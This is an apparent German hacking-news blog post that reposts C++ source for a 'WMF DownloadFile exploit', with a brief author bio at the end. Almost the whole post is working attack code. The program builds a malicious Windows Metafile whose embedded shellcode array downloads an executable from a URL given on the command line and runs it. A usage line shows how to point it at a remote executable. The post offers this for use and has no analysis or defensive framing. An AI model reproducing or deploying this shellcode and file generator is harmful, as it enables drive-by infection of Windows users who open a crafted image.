WMF DownloadFile exploit

Veröffentlicht von ¥akuza112am 16. Januar 2011in : AllgemeinTags: Keine Kommentare

[php]

/****************************************
* *
* WMF DownloadFile exploit by Cr4sh *
* www.cr4sh.h15.ru *
* *
****************************************/

#include <iostream>
#include <tchar.h>
#include <windows.h>

#define FNAME "exploit.wmf"

typedef BYTE uchar;

static uchar header[] =
{
0x01,0x00,0x09,0x00,0x00,0x03,0xED,0x00
,0x00,0x00,0x06,0x00,0x3D,0x00,0x00,0x00
,0x00,0x00,0x11,0x00,0x00,0x00,0x26,0x06
,0x09,0x00,0x16,0x00
};

static uchar sc[]=
{
0xe9,0xcc,0x00,0x00,0x00,0x5f,0xe8,0x56
,0x00,0x00,0x00,0x89,0xc3,0x50,0x68,0x8e
,0x4e,0x0e,0xec,0xe8,0x60,0x00,0x00,0x00
,0x31,0xc9,0x66,0xb9,0x6f,0x6e,0x51,0x68
,0x75,0x72,0x6c,0x6d,0x54,0xff,0xd0,0x50
,0x68,0x36,0x1a,0x2f,0x70,0xe8,0x46,0x00
,0x00,0x00,0x31,0xc9,0x51,0x51,0x8d,0x37
,0x56,0x8d,0x77,0x08,0x56,0x51,0xff,0xd0
,0x53,0x68,0x98,0xfe,0x8a,0x0e,0xe8,0x2d
,0x00,0x00,0x00,0x51,0x57,0xff,0xd0,0x31
,0xc9,0x49,0x90,0x90,0x53,0x68,0x7e,0xd8
,0xe2,0x73,0xe8,0x19,0x00,0x00,0x00,0xff
,0xd0,0x55,0x56,0x64,0xa1,0x30,0x00,0x00
,0x00,0x8b,0x40,0x0c,0x8b,0x70,0x1c,0xad
,0x8b,0x68,0x08,0x89,0xe8,0x5e,0x5d,0xc3
,0x53,0x55,0x56,0x57,0x8b,0x6c,0x24,0x18
,0x8b,0x45,0x3c,0x8b,0x54,0x05,0x78,0x01
,0xea,0x8b,0x4a,0x18,0x8b,0x5a,0x20,0x01
,0xeb,0xe3,0x35,0x49,0x8b,0x34,0x8b,0x01
,0xee,0x31,0xff,0xfc,0x31,0xc0,0xac,0x38
,0xe0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7
,0xeb,0xf2,0x3b,0x7c,0x24,0x14,0x75,0xe1
,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c
,0x4b,0x8b,0x5a,0x1c,0x01,0xeb,0x8b,0x04
,0x8b,0x01,0xe8,0xe9,0x02,0x00,0x00,0x00
,0x31,0xc0,0x89,0xea,0x5f,0x5e,0x5d,0x5b
,0xc3,0xe8,0x2f,0xff,0xff,0xff,0x6d,0x68
,0x68,0x2e,0x65,0x78,0x65,0x00
};

static uchar end[] =
{
0x03,0x00,0x00,0x00,0x00,0x00
};

int _tmain(int argc, _TCHAR* argv[])
{
char *fname = argv[1];

printf("\n WMF download file exploit by Cr4sh\n"
" www.cr4sh.h15.ru\n"
" —————————————-\n");

if (argc < 2) {
printf(" USSAGE: \n"
" exploit.exe http://example.com/somefile.exe\n");
return 0;
}

PMETAHEADER mh = (PMETAHEADER)&header;
PMETARECORD mr = (PMETARECORD)(header + sizeof(METAHEADER));

mh->mtSize = (sizeof(header) + sizeof(sc) + sizeof(end) + strlen(fname)) / 2;

printf(" HEADER \n"
" FileType : 0x%.4x\n"
" HeaderSize : 0x%.4x\n"
" FileSize : 0x%.8x\n"
" METARECORD \n"
" Size : 0x%.8x\n"
" Function : 0x%.4x\n",
mh->mtType, mh->mtHeaderSize, mh->mtSize, mr->rdSize, mr->rdFunction);

HANDLE hf = CreateFile(FNAME, GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);

DWORD written = 0;
WriteFile(hf, (LPCVOID)header, sizeof(header), &written, NULL);
WriteFile(hf, (LPCVOID)sc, sizeof(sc), &written, NULL);
WriteFile(hf, fname, strlen(fname), &written, NULL);
WriteFile(hf, (LPCVOID)end, sizeof(end), &written, NULL);

CloseHandle(hf);

printf(" Done, saved in %s\n", FNAME);

return 0;
}

[/php]

¥akuza112

Ich beschäftige mich größtenteils mit aktuellen Nachrichten bzgl. Hacking, Cracking & Security, sowie Globalen und Scene News. Wir haben uns nicht unterkriegen lassen und sind trotz vieler Drohungen, Ddos Attacken usw. seit August 2010 online. Die Privatsphäre unserer Leser liegt uns sehr am Herzen, weswegen wir keinerlei Nutzerdaten (in Form von IP Adressen) unserer Nutzer in der Datenbank speichern. Falls Sie Fragen, Anregungen oder Kritik haben, schicken Sie mir doch einfach eine Nachricht. Weitere Kontaktmöglichkeiten finden Sie auf yakuza112.org.

Remote Command Injection Exploit

FAQ zu Free-Hack.com

Über den Autor

¥akuza112

Ähnliche Artikel

Hinterlasse eine Antwort Breche Antwort ab